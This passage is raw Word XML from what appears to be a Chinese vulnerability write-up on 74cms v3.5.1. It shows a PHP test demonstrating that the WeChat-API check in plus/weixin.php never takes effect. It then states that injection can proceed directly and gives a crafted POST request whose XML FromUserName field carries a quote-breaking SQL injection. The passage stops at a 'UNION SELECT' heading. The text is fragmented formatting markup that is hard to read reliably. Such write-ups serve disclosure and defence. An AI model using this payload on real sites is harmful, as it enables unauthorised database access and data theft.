            <v:rect id="_x0000_s1201" style="position:absolute;left:2399;top:1264;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1200" style="position:absolute;left:2520;top:1264;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1199" style="position:absolute;left:2640;top:1264;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1198" style="position:absolute;left:2761;top:1264;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1197" style="position:absolute;left:1617;top:1527;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1196" style="position:absolute;left:1797;top:1590;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1195" style="position:absolute;left:2399;top:1590;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1194" style="position:absolute;left:2520;top:1590;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1193" style="position:absolute;left:3002;top:1590;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1192" style="position:absolute;left:3122;top:1590;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1191" style="position:absolute;left:1617;top:1853;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1190" type="#_x0000_t75" style="position:absolute;left:1797;top:1916;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1189" style="position:absolute;left:2197;top:1916;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1188" style="position:absolute;left:3161;top:1916;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1187" style="position:absolute;left:3281;top:1916;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1186" style="position:absolute;left:4366;top:1916;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1185" style="position:absolute;left:4486;top:1916;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1184" style="position:absolute;left:1617;top:2179;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1183" style="position:absolute;left:1797;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1182" style="position:absolute;left:1897;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1181" style="position:absolute;left:1997;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1180" style="position:absolute;left:2097;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1179" style="position:absolute;left:2197;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1178" style="position:absolute;left:2297;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1177" style="position:absolute;left:2397;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1176" style="position:absolute;left:2497;top:2242;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1175" style="position:absolute;left:2597;top:2242;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1174" style="position:absolute;left:3079;top:2242;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1173" style="position:absolute;left:3199;top:2242;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1172" style="position:absolute;left:3922;top:2242;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1171" style="position:absolute;left:4043;top:2242;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1170" style="position:absolute;left:4284;top:2242;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1169" style="position:absolute;left:4404;top:2242;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1168" style="position:absolute;left:5248;top:2242;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1167" style="position:absolute;left:5368;top:2242;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1166" style="position:absolute;left:5489;top:2242;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1165" style="position:absolute;left:5609;top:2242;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1164" style="position:absolute;left:1617;top:2505;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1163" type="#_x0000_t75" style="position:absolute;left:1797;top:2568;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1162" style="position:absolute;left:1617;top:2831;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1161" style="position:absolute;left:1797;top:2894;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1160" style="position:absolute;left:1617;top:3157;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1159" style="position:absolute;left:1797;top:3220;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1158" style="position:absolute;left:2279;top:3220;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1157" style="position:absolute;left:2399;top:3220;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1156" style="position:absolute;left:2761;top:3220;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1155" style="position:absolute;left:2881;top:3220;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1154" style="position:absolute;left:3363;top:3220;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1153" style="position:absolute;left:3484;top:3220;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1152" style="position:absolute;left:3725;top:3220;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1151" style="position:absolute;left:3845;top:3220;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1150" style="position:absolute;left:3966;top:3220;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1149" style="position:absolute;left:4086;top:3220;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1148" style="position:absolute;left:1617;top:3483;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1147" style="position:absolute;left:1797;top:3546;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1146" style="position:absolute;left:2158;top:3546;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1145" style="position:absolute;left:2279;top:3546;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1144" style="position:absolute;left:2399;top:3546;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1143" style="position:absolute;left:2520;top:3546;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1142" style="position:absolute;left:2881;top:3546;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1141" style="position:absolute;left:3002;top:3546;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1140" style="position:absolute;left:1617;top:3809;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1139" style="position:absolute;left:1797;top:3872;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1138" style="position:absolute;left:1617;top:4135;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1137" style="position:absolute;left:1797;top:4198;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1136" type="#_x0000_t202" style="position:absolute;left:1614;top:692;width:6750;height:3951" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="6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&lt;?php</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/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$_CFG = 0;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class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Test {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="579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function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myprint() {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="9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</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$_CFG in class=" . $_CFG;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="579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4"/>
                      <w:ind w:left="18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9"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>}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proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>echo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 xml:space="preserve"> "in file =" . $_CFG;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$tt = new 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Test(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$tt-&gt;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myprint(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);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="180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?&gt;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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CFG[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>'weixin_apiopen']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>真的有效么？下面的代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1134" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.3pt;width:337.5pt;height:80.65pt;z-index:9400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6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proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>in</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> file =0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Notice: Undefined variable: _CFG in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/var/www/html/74cms/test.php on line 7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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>**.**.**.**:8081/74cms/test.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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MS Mincho"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1133" type="#_x0000_t202" style="width:337.5pt;height:67.1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Notice: Undefined variable: _CFG in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1970"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/var/www/html/74cms/test.php on line 7 in class=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10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1113"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1132" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:34.55pt;width:337.5pt;height:34.55pt;z-index:9448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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>CFG[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'weixin_apiopen']=='0'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</w:rPr>
        <w:t>也就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">class object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">$_CFG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是无效的。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那么，那么，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="879"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个条件就是永远都不会成立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，不管你后台开不开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-61"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>weixin_api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好了，所有条件限制都排除了，可以直接注入了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="28"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1131" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.75pt;width:337.5pt;height:262.75pt;z-index:9472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7"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="1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POST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 xml:space="preserve">/74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d325 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>5bfef95601890afd80709 HTTP/1.1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3070"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Content-Type: application/xml User-Agent: http4e/5.0.12 Host: **</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.*</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*.**.**:8081 Content-Length: 155</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="12"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="24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&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>xml</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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&lt;ToUserName&gt;111&lt;/ToUserName&gt;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&lt;FromUserName&gt;1111&amp;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>apos;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;/FromUserName&gt;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&lt;Content&gt;2222&lt;/Content&gt;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&lt;Event&gt;CLICK&lt;/Event&gt;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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>tKey&gt;binding&lt;/EventKey&gt;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&lt;/xml&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-59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74cms_v3.5.1_20141027 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>UNION SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId107"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="190"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
